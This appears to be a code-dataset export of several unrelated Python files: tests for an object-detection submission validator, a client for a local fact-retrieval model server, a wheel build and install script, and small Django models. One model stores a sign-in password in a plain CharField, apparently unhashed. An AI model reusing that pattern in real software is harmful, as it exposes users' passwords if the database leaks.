self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_label_probs_wrong_length(self):
with self.assertRaises(KeyError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=6, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_warns_for_label_probs_ignored(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
submission_validator.validate_detections([{
'label_probs': [0.01, 0.01, 0.01, 0.01, 0.02],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assertEqual(1, len(w))
self.assertTrue(issubclass(w[-1].category, UserWarning))
self.assert_contains_indexes(str(w[-1].message), 'test.json', 13, 0)
def test_warns_for_label_probs_normalized(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.5, 0.5, 0.2],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assertEqual(1, len(w))
self.assertTrue(issubclass(w[-1].category, UserWarning))
self.assert_contains_indexes(str(w[-1].message), 'test.json', 13, 0)
def test_errors_for_missing_bbox(self):
with self.assertRaises(KeyError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2]
# 'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_bbox_wrong_size(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46, 47]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_bbox_xmax_less_than_xmin(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [55, 14, 12, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_bbox_ymax_less_than_ymin(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 46, 55, 14]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_invalid_cov(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[1, 0], [0, 1]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_assymetric_cov(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [3, 4]], [[1, 0], [0, 1]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[5, 6], [7, 8]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_non_positive_definite_cov(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 2], [2, 1]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def assert_contains_indexes(self, msg, sequence_name, img_num, det_idx):
self.assertIn(str(sequence_name), msg)
self.assertIn(str(img_num), msg)
self.assertIn(str(det_idx), msg)
class TestSubmissionValidatorValidateSequence(th.ExtendedTestCase):
temp_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'temp')
def tearDown(self):
if os.path.isdir(self.temp_dir):
shutil.rmtree(self.temp_dir)
def make_sequence(self, detections):
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
patch_classes(detections)
with open(json_file, 'w') as fp:
json.dump({
'classes': submission_validator.CLASSES,
'detections': detections
}, fp)
return json_file
def test_errors_contain_correct_image_numbers(self):
detections = [
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}],
[],
[],
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}, {
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}],
]
sequence_json = self.make_sequence(detections)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_sequence(sequence_json)
msg = str(cm.exception)
self.assertIn(os.path.basename(sequence_json), msg)
self.assertIn('3', msg)
self.assertIn('1', msg)
def test_errors_if_classes_missing(self):
detections = [
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}],
[],
[],
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}, {
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}],
]
patch_classes(detections)
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
with open(json_file, 'w') as fp:
json.dump({
# 'classes': submission_validator.CLASSES,
'detections': detections
}, fp)
with self.assertRaises(KeyError) as cm:
submission_validator.validate_sequence(json_file)
msg = str(cm.exception)
self.assertIn('test.json', msg)
def test_errors_if_detections_missing(self):
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
with open(json_file, 'w') as fp:
json.dump({
'classes': submission_validator.CLASSES,
# 'detections': detections
}, fp)
with self.assertRaises(KeyError) as cm:
next(submission_validator.validate_sequence(json_file))
msg = str(cm.exception)
self.assertIn('test.json', msg)
def test_errors_if_no_valid_classes(self):
detections = [
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}],
[],
[],
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}, {
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}],
]
patch_classes(detections)
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
with open(json_file, 'w') as fp:
json.dump({
'classes': [str(idx) for idx in range(len(submission_validator.CLASSES))],
'detections': detections
}, fp)
with self.assertRaises(ValueError) as cm:
next(submission_validator.validate_sequence(json_file))
msg = str(cm.exception)
self.assertIn('test.json', msg)
class TestSubmissionLoaderReadSubmission(th.ExtendedTestCase):
temp_dir = os.path.join(os.path.dirname(__file__), 'temp')
def tearDown(self):
if os.path.isdir(self.temp_dir):
shutil.rmtree(self.temp_dir)
def make_submission(self, detections_map, subfolder=None):
root = self.temp_dir
if subfolder is not None:
root = os.path.join(self.temp_dir, subfolder)
os.makedirs(root, exist_ok=True)
for sequence_name, detections in detections_map.items():
json_file = os.path.join(root, '{0}.json'.format(sequence_name))
patch_classes(detections)
with open(json_file, 'w') as fp:
json.dump({
'classes': submission_validator.CLASSES,
'detections': detections
}, fp)
def test_raises_error_if_directory_doesnt_exist(self):
not_a_dir = os.path.join(self.temp_dir, 'not', 'a', 'dir')
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(not_a_dir)
msg = str(cm.exception)
self.assertIn(not_a_dir, msg)
def test_raises_error_if_missing_sequences(self):
all_idx = set(range(18))
excluded = {3, 4, 5, 13, 17}
self.make_submission({'{0:06}'.format(idx): [] for idx in all_idx - excluded})
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(self.temp_dir)
msg = str(cm.exception)
for idx in excluded:
self.assertIn('{0:06}'.format(idx), msg)
def test_raises_error_if_duplicate_sequence(self):
self.make_submission({'{0:06}'.format(idx): [] for idx in range(18)}, 'folder_a')
self.make_submission({'000000': []}, 'folder_b')
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(self.temp_dir)
msg = str(cm.exception)
self.assertIn('folder_a/000000.json', msg)
self.assertIn('folder_b/000000.json', msg)
def test_no_error_if_testing_subset(self):
all_idx = set(range(18))
excluded = {3, 4, 5, 13, 17}
subset = [idx for idx in all_idx - excluded]
self.make_submission({'{0:06}'.format(idx): [] for idx in subset})
submission_validator.validate_submission(self.temp_dir, sequence_ids=[idx for idx in subset])
def test_raise_error_if_missing_sequence_in_subset(self):
all_idx = set(range(18))
excluded = {3, 4, 5, 13, 17}
subset = [idx for idx in all_idx - excluded]
self.make_submission({'{0:06}'.format(idx): [] for idx in subset[:-1]})
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(self.temp_dir,
sequence_ids=subset)
msg = str(cm.exception)
self.assertIn('{0:06}'.format(16), msg)
def patch_classes(detections):
# Patch the label probabilities to be the right length
for img_dets in detections:
for det in img_dets:
if len(det['label_probs']) < len(submission_validator.CLASSES):
det['label_probs'] = make_probs(det['label_probs'])
def make_probs(probs):
full_probs = [0.0] * len(submission_validator.CLASSES)
full_probs[0:len(probs)] = probs
return full_probs
|
python
|
import requests
use_paragraphs = True
def main():
url = "http://0.0.0.0:8100/model"
if use_paragraphs:
request_data = [
{
"human_sentences": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"dialog_history": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"nounphrases": [["Sheldon Cooper", "The Big Bang Theory"]],
"entity_pages": [
[
[
"Sheldon Lee Cooper is a fictional character in the CBS television series "
"The Big Bang Theory."
],
[
"The Big Bang Theory is an American television sitcom created by Chuck "
"Lorre and Bill Prady"
],
]
],
},
{
"human_sentences": ["What is the capital of Germany?"],
"dialog_history": ["What is the capital of Germany?"],
"nounphrases": [["the capital", "Germany"]],
"entity_pages": [[["Germany is a country in Central Europe."]]],
},
{"human_sentences": ["/alexa_stop_handler."], "dialog_history": [""], "nounphrases": [[]]},
{"human_sentences": [" "], "dialog_history": [""], "nounphrases": [[]]},
]
else:
request_data = [
{
"human_sentences": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"dialog_history": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"entity_substr": [["Sheldon Cooper", "The Big Bang Theory"]],
"entity_pages": [[["Sheldon Cooper"], ["The Big Bang Theory"]]],
},
{
"human_sentences": ["What is the capital of Germany?"],
"dialog_history": ["What is the capital of Germany?"],
"entity_substr": [["the capital", "Germany"]],
"entity_pages": [[["Capital"], ["Germany"]]],
},
{"human_sentences": ["/alexa_stop_handler."], "dialog_history": [""], "entity_substr": [[]]},
{"human_sentences": [" "], "dialog_history": [""], "entity_substr": [[]]},
]
gold_results = [
[
"Sheldon Lee Cooper is a fictional character in the CBS television series The Big Bang Theory.",
"The Big Bang Theory is an American television sitcom created by Chuck Lorre and Bill Prady",
],
["Germany is a country in Central Europe."],
[],
[],
]
count = 0
for data, gold_result in zip(request_data, gold_results):
result = requests.post(url, json=data).json()
if result[0]["facts"] == gold_result:
count += 1
else:
print(f"Got {result}, but expected: {gold_result}")
assert count == len(request_data)
print("Success")
if __name__ == "__main__":
main()
|
python
|
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import platform
from subprocess import run
def is_macos():
"""
:return: True if system is MacOS, False otherwise
"""
return platform.system() == 'Darwin'
def is_windows():
"""
:return: True if system is Windows, False otherwise
"""
return platform.system() == 'Windows'
def is_linux():
"""
:return: True if system is Windows, False otherwise
"""
return platform.system() == 'Linux'
PROJECT_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__))))
sys.path.append(os.path.abspath(os.path.join(PROJECT_DIR, "src", "code_generator")))
from version import VERSION
PYTHON = "python3"
PIP = "pip3"
if is_macos() or is_linux():
PYTHON = "python3"
PIP = "pip3"
elif is_windows():
PYTHON = "python"
PIP = "pip"
def uninstall_wheel():
"""
pip.exe uninstall -y auditor-srv
"""
run([PIP, 'uninstall', '-y', 'code-generator'])
def build_wheel():
"""
python.exe -m pip install --upgrade pip
python.exe -m pip install --upgrade build
python.exe -m build
"""
run([PYTHON, '-m', 'pip', 'install', '--upgrade', 'pip'])
run([PYTHON, '-m', 'pip', 'install', '--upgrade', 'build'])
run([PYTHON, '-m', 'build'])
def install_wheel():
"""
pip.exe install ./dist/auditor_srv-{VERSION}-py3-none-any.whl
"""
wheel_path = os.path.join(PROJECT_DIR, 'dist', 'code_generator-{}-py3-none-any.whl'.format(VERSION))
run([PIP, 'install', wheel_path])
def main():
parser = argparse.ArgumentParser(description='Command-line params')
parser.add_argument('--mode',
help='What to di with the package',
choices=["build", "install", "reinstall", "uninstall"],
default="reinstall",
required=False)
args = parser.parse_args()
if args.mode == "build":
build_wheel()
elif args.mode == "install":
build_wheel()
install_wheel()
elif args.mode == "reinstall":
uninstall_wheel()
build_wheel()
install_wheel()
elif args.mode == "uninstall":
uninstall_wheel()
else:
print("Unknown mode")
return 0
if __name__ == '__main__':
sys.exit(main())
|
python
|
from django.db import models
# Create your models here.
class SigninModel(models.Model):
username = models.CharField(max_length=10)
password = models.CharField(max_length=50)
class BookTicketModel(models.Model):
post = models.CharField(max_length=10)
class AdjustTicketModel(models.Model):
post = models.CharField(max_length=10)
class CancelTicketModel(models.Model):
post = models.CharField(max_length=10)
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.